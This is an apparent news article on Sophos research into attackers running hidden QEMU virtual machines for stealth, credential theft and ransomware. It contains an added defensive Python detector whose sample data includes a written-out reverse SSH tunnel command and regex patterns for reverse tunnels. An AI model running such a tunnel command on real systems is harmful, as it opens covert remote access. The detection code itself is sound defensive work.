- Hidden virtual machines allow attackers to bypass endpoint security and go unnoticed
- The attackers used trusted virtualization tools and embedded software to disguise malicious activity.
- Sophos links campaigns using QEMU to ransomware deployment and long-term network access
Attackers are increasingly hiding malicious tools inside virtual machines to bypass security controls.
Sophos analysts say the approach relies on virtualization software that security systems often treat as legitimate activity.
In recent incidents, attackers used QEMU, an open source machine emulator and virtualizer, to run hidden environments where malicious activity remained largely invisible to endpoint defenses and left minimal evidence on the host system.
A growing tendency to evade
Sophos notes that while the method is not new, it has gained traction again, with two active campaigns, tracked as STAC4713 and STAC3725, identified since late last year.
In the STAC4713 campaign, attackers created a scheduled task called TPMProfiler to start a hidden QEMU virtual machine with system-level privileges.
The virtual machine used disguised disk images, which first appeared as database files and then posed as dynamic link libraries.
Once launched, the virtual machine established reverse SSH tunnels that created covert remote access channels, allowing attackers to run tools and collect domain credentials without exposing the activity to traditional security tools.
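Two defender-side checks for the STAC4713 tradecraft just described, as an added example that is not Sophos's or TechRadar's code: the first tells whether a file whose extension claims .dll or .db actually carries a QEMU qcow2 or VMDK disk-image header, the second flags process records where QEMU is started by a scheduled task or as SYSTEM, or ssh is started with a remote port forward (the reverse-tunnel pattern). The task name is modelled on the article's TPMProfiler; the file paths, command lines and the 203.0.113.10 address are constructed sample data.

```python
import re
from pathlib import Path

# Magic bytes that sit at offset 0 of common VM disk images.
DISK_MAGICS = {b"QFI\xfb": "qcow2", b"KDMV": "vmdk"}
IMAGE_SUFFIXES = {".qcow2", ".qcow", ".img", ".vmdk", ".raw"}
PE_MAGIC = b"MZ"  # every genuine DLL starts with this


def classify_header(name, head):
    """Label a file from its name and first bytes; None means nothing odd."""
    suffix = Path(name).suffix.lower()
    for magic, fmt in DISK_MAGICS.items():
        if head.startswith(magic) and suffix not in IMAGE_SUFFIXES:
            return f"disguised_{fmt}"          # disk image wearing a .dll/.db name
    if suffix == ".dll" and not head.startswith(PE_MAGIC):
        return "dll_without_pe_header"         # not an image we know, but not a DLL
    return None


def classify_file(path):
    """Same check against a real file on disk (reads only the first 8 bytes)."""
    with open(path, "rb") as fh:
        return classify_header(path, fh.read(8))


# Constructed scheduled-task / process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"task": "TPMProfiler", "user": "SYSTEM",
     "cmd": r"C:\ProgramData\tpm\qemu-system-x86_64.exe -display none -drive file=C:\ProgramData\tpm\tpm.dll"},
    {"task": "GoogleUpdateTaskMachine", "user": "SYSTEM",
     "cmd": r"C:\Program Files\Google\Update\GoogleUpdate.exe /ua"},
    {"task": None, "user": "jsmith",
     "cmd": r"C:\Windows\System32\OpenSSH\ssh.exe -N -R 2222:localhost:22 user@203.0.113.10"},
]

QEMU_RE = re.compile(r"qemu-system-\w+(\.exe)?\b", re.I)
REVERSE_SSH_RE = re.compile(r"\bssh(\.exe)?\b.*\s-R\s", re.I)  # -R = remote forward


def suspicious_events(events):
    """Return (rule, task, cmd) for QEMU run from a task/as SYSTEM and ssh with -R."""
    hits = []
    for ev in events:
        cmd = ev["cmd"]
        if QEMU_RE.search(cmd) and (ev["task"] or ev["user"].upper() == "SYSTEM"):
            hits.append(("qemu_from_task_or_system", ev["task"], cmd))
        elif REVERSE_SSH_RE.search(cmd):
            hits.append(("reverse_ssh_tunnel", ev["task"], cmd))
    return hits
```

Pair the file check with a scan of the directories your scheduled tasks reference, and the event check with process-creation logs (e.g. Sysmon event 1), since a bare QEMU binary on a workstation is itself worth a look.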
Sophos researchers also observed the attackers using built-in Windows utilities, such as Microsoft Paint, Notepad, and Edge, to access files and discover networks. Leaning on trusted software in this way blends malicious actions into routine system behavior.
Earlier intrusions linked to the campaign used exposed VPN systems without multi-factor authentication, while later incidents exploited a SolarWinds web help desk vulnerability tracked as CVE-2025-26399. These varied entry points show attackers adjusting their tactics depending on the available weaknesses.
Sophos links the STAC4713 campaign to the PayoutsKing ransomware, which focuses on encrypting virtualized environments.
The group behind the ransomware appears to target hypervisors and deploys tools that can operate on VMware and ESXi systems.
The second campaign, STAC3725, relied on exploiting the CitrixBleed2 vulnerability to gain initial access before installing remote access software.
The attackers then launched a QEMU virtual machine to manually assemble attack tools for credential theft and network reconnaissance.
Instead of delivering ready-made payloads, the attackers compiled their toolkits inside the virtual machine after gaining access. That approach let them tailor each attack and reduced the chance of detection by signature-based defenses.
Sophos warns that hiding activity within virtual machines represents a growing evasion trend. Strong endpoint protection, network monitoring, and timely patching of exposed systems are critical to reducing risk.